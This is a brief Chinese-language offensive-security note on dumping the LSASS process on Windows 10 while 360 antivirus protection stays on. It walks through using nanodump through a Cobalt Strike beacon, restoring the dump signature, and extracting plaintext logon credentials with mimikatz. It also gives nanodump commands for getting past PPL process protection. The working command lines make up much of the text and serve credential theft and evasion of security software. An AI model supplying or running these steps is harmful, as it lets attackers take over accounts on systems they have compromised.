360核晶下的dumplsass
无PPL
测试环境为Win10 全程开启360核晶
在免杀上线beacon后利用nanodump BOF直接dump
工具地址:https://github.com/fortra/nanodump
需要注意只有x64的免杀马才能用nanodump
CS下载到本地,若未指定–valid,需要先还原签名
ps:一开始以为PPL的原因解密时报错LSA
1 | ./restore_signature WINDOWS-10_1708444406_lsass.dmp |
mimikatz解密
1 | mimikatz.exe "sekurlsa::minidump WINDOWS-10_1708444406_lsass.dmp" "sekurlsa::logonPasswords full" exit |
有PPL
Win10有PPL进程保护 能dump解密不了 会报LSA的错误
nanodump中自带了PPL绕过可以尝试
1 | nanodump_ppl_dump -v -w C:\Windows\Temp\lsass.dmp |
1 | nanodump_ppl_medic -v -w C:\Windows\Temp\lsass.dmp |
其他绕过方式可以参考这篇文章:
https://tttang.com/archive/1743/
__END__
